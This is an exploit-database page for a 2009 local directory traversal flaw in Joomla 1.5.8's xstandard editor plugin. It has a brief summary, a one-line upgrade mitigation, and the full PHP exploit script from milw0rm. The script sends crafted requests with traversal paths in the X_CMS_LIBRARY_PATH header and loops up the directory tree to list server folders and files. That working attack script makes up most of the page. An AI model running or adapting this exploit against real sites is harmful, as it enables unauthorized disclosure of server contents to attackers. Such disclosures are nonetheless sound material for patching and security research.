header-logo
Suggest Exploit
vendor:
Joomla
by:
irk4z[at]yahoo.pl
7.5
CVSS
HIGH
Local Directory Traversal
22
CWE
Product Name: Joomla
Affected Version From: 1.5.2008
Affected Version To: 1.5.2008
Patch Exists: YES
Related CWE: N/A
CPE: a:joomla:joomla
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability

This vulnerability allows an attacker to traverse the local directory of the vulnerable Joomla version 1.5.8 using the xstandard editor. The attacker can send a specially crafted HTTP request with the X_CMS_LIBRARY_PATH header set to the desired directory and the server will respond with the contents of the directory. This vulnerability can be exploited to gain access to sensitive information stored in the server.

Mitigation:

Upgrade to the latest version of Joomla.
Source

Exploit-DB raw data:

<?php
/*
 Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
 
 discovered by: irk4z[at]yahoo.pl
 greets: all friends ;) 
*/

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

$host = $argv[1];
$path = $argv[2];
$folder = $argv[3];

if (empty($host) || empty($path)) {
	echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";
	echo "       php {$argv[0]} example.org /joomla\n";
	echo "       php {$argv[0]} example.org /joomla ../../\n";
	exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
	$lev = "./";
	for( $i = 0; $i <= 7; $i++ ) {
		echo browseFolder($host, $path, $lev);
		$lev .= "../";
	}
} else {
	echo browseFolder($host, $path, $folder);
}

function browseFolder($host, $path, $folder){
	
	$packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";
	$packet .= "Host: {$host}\r\n";
	$packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";
	$packet .= "Connection: Close\r\n\r\n";

	$o = @fsockopen($host, 80);
	if(!$o){
		echo "\n[x] No response...\n";
		die;
	}
	
	fputs($o, $packet);
	while (!feof($o)) $data .= fread($o, 1024);
	fclose($o);
	
	$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
	if ( !empty($_404) ){
		echo "\n[x] 404 Not Found... Maybe wrong path? \n";
		die;
	}
	
	//folders
	preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);
	//files
	preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);
	
	$matches = array_merge( $matches[1], $matches2[1] );
	
	if ( empty($matches) ){
		$ret = "$folder [x] Failed...\n";
	} else {
		$ret = '';
		foreach( $matches as $tmp){
			$ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";
		}
	}
	
	return ($ret);
}

?>

# milw0rm.com [2009-01-07]

Navigation

Suggest Exploit

Services By CQR